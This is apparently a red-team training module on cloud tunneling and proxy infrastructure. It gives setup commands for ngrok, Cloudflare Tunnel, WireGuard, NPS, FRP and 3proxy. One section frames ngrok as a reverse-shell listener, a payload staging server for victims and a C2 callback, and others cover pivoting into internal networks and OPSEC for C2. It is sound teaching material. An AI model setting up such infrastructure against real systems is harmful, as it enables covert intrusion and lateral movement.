Back to All Modules

Cloud-Based Tunneling and Proxy Infrastructure

#Overview

Cloud tunneling services provide persistent, encrypted tunnels through CDN and cloud infrastructure. These are increasingly relevant for red team operations where cloud egress is permitted and you need stable, NAT-traversing tunnels that survive network changes.

#ngrok

ngrok creates stable tunnels through ngrok's cloud infrastructure. Useful as a callback endpoint behind NAT.

# Install
curl -s https://ngrok-client.s3.amazonaws.com/ngrok.asc | sudo tee /etc/apt/trusted.gpg.d/ngrok.asc > /dev/null
echo "deb https://ngrok-client.s3.amazonaws.com buster main" | sudo tee /etc/apt/sources.list.d/ngrok.list
sudo apt update && sudo apt install ngrok

# Authenticate
ngrok config add-authtoken <token>

# HTTP tunnel (exposes local port as HTTPS URL)
ngrok http 8080

# TCP tunnel (exposes local port as TCP endpoint)
ngrok tcp 22

# TLS tunnel (encrypted TCP)
ngrok tls 443

# With custom domain (paid)
ngrok http --domain=tunnel.example.com 8080
BASH

#Red Team Use Cases

# 1. Stable reverse shell listener behind NAT
ngrok tcp 4444
# Client connects to: tcp://0.tcp.ngrok.io:XXXXX

# 2. Payload staging server
ngrok http 8080
# Victim downloads from: https://xxxx.ngrok-free.app/payload.exe

# 3. C2 callback endpoint
ngrok tls 443
# Implant beacons to: tls://xxxx.ngrok-free.app:443
BASH

#Cloudflare Tunnel (cloudflared)

Cloudflare Tunnel (formerly Argo Tunnel) creates an encrypted tunnel from your server to Cloudflare's edge. No open firewall ports needed.

# Install
wget -q https://github.com/cloudflare/cloudflared/releases/latest/download/cloudflared-linux-amd64.deb
sudo dpkg -i cloudflared-linux-amd64.deb

# Authenticate
cloudflared tunnel login

# Create tunnel
cloudflared tunnel create redteam-tunnel

# Configure tunnel
cat > ~/.cloudflared/config.yml << EOF
tunnel: <tunnel-id>
credentials-file: /root/.cloudflared/<tunnel-id>.json

ingress:
  - hostname: c2.yourdomain.com
    service: http://127.0.0.1:8080
  - hostname: staging.yourdomain.com
    service: http://127.0.0.1:9090
  - service: http_status:404
EOF

# Create DNS record
cloudflared tunnel route dns redteam-tunnel c2.yourdomain.com

# Run tunnel
cloudflared tunnel run redteam-tunnel
BASH

#Cloudflare Tunnel Advantages

  • No open inbound ports on the team server
  • TLS termination at Cloudflare edge
  • Legitimate Cloudflare IP addresses in traffic
  • Custom domain with valid TLS certificate

#WireGuard-Based Pivoting

WireGuard is a lightweight VPN protocol that can be used for fast, encrypted pivoting between hosts.

# Install
apt install wireguard

# Generate keys
wg genkey | tee server_private.key | wg pubkey > server_public.key
wg genkey | tee client_private.key | wg pubkey > client_public.key

# Server (attacker) configuration
cat > /etc/wireguard/wg0.conf << EOF
[Interface]
Address = 10.200.0.1/24
ListenPort = 51820
PrivateKey = $(cat server_private.key)

[Peer]
PublicKey = $(cat client_public.key)
AllowedIPs = 10.200.0.2/32
EOF

# Client (pivot) configuration
cat > /etc/wireguard/wg0.conf << EOF
[Interface]
Address = 10.200.0.2/24
PrivateKey = $(cat client_private.key)

[Peer]
PublicKey = $(cat server_public.key)
Endpoint = <attacker_ip>:51820
AllowedIPs = 10.200.0.0/24, 172.16.0.0/24
PersistentKeepalive = 25
EOF

# Start WireGuard
wg-quick up wg0

# Verify
ping 10.200.0.1   # From client
ping 10.200.0.2   # From server

# Enable IP forwarding on server
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A POSTROUTING -s 10.200.0.0/24 -o eth0 -j MASQUERADE

# Route internal traffic through WireGuard on client
ip route add 172.16.0.0/24 via 10.200.0.1 dev wg0
BASH

#WireGuard vs SSH Tunneling

FeatureWireGuardSSH -D/-L/-R
SpeedKernel-level (fast)User-space (slower)
SetupConfig file + wg-quickSingle command
ProtocolUDP onlyTCP only
TransparencyFull VPN (all traffic)SOCKS or port forward
Persistencesystemd serviceautossh

#NPS (Lightweight Proxy Server)

NPS is a lightweight, self-hosted reverse proxy server with web management.

# Install server (attacker)
wget https://github.com/ehang-io/nps/releases/download/v0.26.10/linux_amd64_server.tar.gz
tar -xzf linux_amd64_server.tar.gz
sudo ./nps install
sudo nps start

# Web management at http://<attacker>:8080 (admin/123)
# Add clients, configure tunnels through the web UI

# Install client (pivot)
wget https://github.com/ehang-io/nps/releases/download/v0.26.10/linux_amd64_client.tar.gz
tar -xzf linux_amd64_client.tar.gz
./npc -server=<attacker>:8024 -vkey=<client_key>
BASH

#FRP (Fast Reverse Proxy)

# Server (attacker) configuration
cat > frps.ini << EOF
[common]
bind_port = 7000
EOF

# Start server
./frps -c frps.ini

# Client (pivot) configuration
cat > frpc.ini << EOF
[common]
server_addr = <attacker_ip>
server_port = 7000

[socks]
type = tcp
remote_port = 1080
plugin = socks5
EOF

# Start client
./frpc -c frpc.ini

# Use SOCKS proxy on attacker:1080
proxychains4 nmap -sn 172.16.0.0/24
BASH

#3proxy (SOCKS/HTTP Proxy Chain)

# Install
apt install 3proxy

# Configuration
cat > /etc/3proxy/3proxy.cfg << EOF
dnspr
nserver 8.8.8.8
nscache 65536
timeouts 1 5 30 60 180 1800 15 60

users admin:CL:password123
auth strong

# SOCKS5 proxy
flush
auth strong
allow admin
socks -p1080

# HTTP proxy
flush
auth strong
allow admin
proxy -p3128
EOF

# Start
sudo systemctl start 3proxy

# Connect with authentication
curl -x socks5://admin:password123@127.0.0.1:1080 http://172.16.0.10/
BASH

#Common Pitfalls

  1. ngrok rate limits: Free ngrok has connection and bandwidth limits. Use paid plan for sustained operations.
  2. Cloudflare tunnel DNS propagation: New DNS records take minutes to propagate. Plan ahead.
  3. WireGuard UDP blocking: If UDP is blocked outbound, WireGuard won't work. Fall back to SSH or Chisel.
  4. NPS/FRP security: Default credentials are weak. Always change admin passwords and use TLS.
  5. 3proxy authentication: Without auth, anyone can use your proxy. Always configure auth strong.

#OPSEC Considerations

  • ngrok and Cloudflare tunnels use well-known cloud IP ranges — some organizations block these
  • WireGuard UDP traffic is detectable by protocol analysis
  • NPS/FRP web management interfaces are often exposed to the internet — secure them
  • Cloud-based tunnels leave DNS records and TLS certificates that persist after the engagement
  • Always use custom domains with valid TLS certificates for C2 infrastructure

#Cross-References